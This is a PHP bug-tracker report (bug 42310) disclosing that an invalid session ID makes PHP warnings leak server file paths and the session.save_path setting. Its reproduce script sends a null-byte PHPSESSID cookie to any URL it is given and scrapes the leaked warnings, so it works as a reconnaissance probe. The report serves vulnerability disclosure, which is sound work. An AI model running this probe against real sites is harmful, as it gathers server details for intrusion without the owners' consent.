From: astalor at gmail dot com
Operating system: ALL
PHP version: 5.2.4RC1
PHP Bug Type: Session related
Bug description: Information disclousre when using invalid symbol in the
session id
Description:
------------
If you put invalid symbol in the session ID and PHP warnings are turned on
you can retrieve information about files and paths on the server and also
in some cases the configured session.save_path variable from PHP.INI, this
can display warnings (and sometimes break pages that count on redirection
with header()) on pages that are perfectly correct and without any errors
in them.
Reproduce code:
---------------
<?php
/* This script check if PHP warnings are enabled for the targeted website
*/
function checkWarnings($url) {
$ch = curl_init ();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 2);
curl_setopt($ch, CURLOPT_COOKIE,"PHPSESSID=\0");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER , 1);
$output = curl_exec($ch);
curl_close($ch);
preg_match_all("/<b>Warning<\/b>:(.*)<br \/>/i",$output,$match);
preg_match_all("/session.save_path is correct
\((.*)\)/i",$output,$path);
#echo $output;
echo "<pre>";
echo "Checking <b>$url</b>\n";
if (count($match[0]) > 0) {
echo "<b>Warnings found</b>:\n";
echo implode("\n",$match[0]);
} else {
echo "Warning are <b>disabled</b>\n";
}
if ($_GET['debug'] == 1) {
echo "<b>Displaying page:</b>\n";
echo $output;
}
#print_r($path);
}
checkWarnings($_GET['url']);
?>
Expected result:
----------------
Warning: session_start() [function.session-start]: The session id
contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in
/home/user/public_html/main/file.php on line 32
Warning: Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct (/tmp) in Unknown
on line 0
Actual result:
--------------
the same as the expected result, as long as the PHP warning are enabled
--
Edit bug report at http://bugs.php.net/?id=42310&edit=1
--
Try a CVS snapshot (PHP 4.4):
http://bugs.php.net/fix.php?id=42310&r=trysnapshot44
Try a CVS snapshot (PHP 5.2):
http://bugs.php.net/fix.php?id=42310&r=trysnapshot52
Try a CVS snapshot (PHP 6.0):
http://bugs.php.net/fix.php?id=42310&r=trysnapshot60
Fixed in CVS: http://bugs.php.net/fix.php?id=42310&r=fixedcvs
Fixed in release:
http://bugs.php.net/fix.php?id=42310&r=alreadyfixed
Need backtrace: http://bugs.php.net/fix.php?id=42310&r=needtrace
Need Reproduce Script: http://bugs.php.net/fix.php?id=42310&r=needscript
Try newer version: http://bugs.php.net/fix.php?id=42310&r=oldversion
Not developer issue: http://bugs.php.net/fix.php?id=42310&r=support
Expected behavior: http://bugs.php.net/fix.php?id=42310&r=notwrong
Not enough info:
http://bugs.php.net/fix.php?id=42310&r=notenoughinfo
Submitted twice:
http://bugs.php.net/fix.php?id=42310&r=submittedtwice
register_globals: http://bugs.php.net/fix.php?id=42310&r=globals
PHP 3 support discontinued: http://bugs.php.net/fix.php?id=42310&r=php3
Daylight Savings: http://bugs.php.net/fix.php?id=42310&r=dst
IIS Stability: http://bugs.php.net/fix.php?id=42310&r=isapi
Install GNU Sed: http://bugs.php.net/fix.php?id=42310&r=gnused
Floating point limitations: http://bugs.php.net/fix.php?id=42310&r=float
No Zend Extensions: http://bugs.php.net/fix.php?id=42310&r=nozend
MySQL Configuration Error: http://bugs.php.net/fix.php?id=42310&r=mysqlcfg
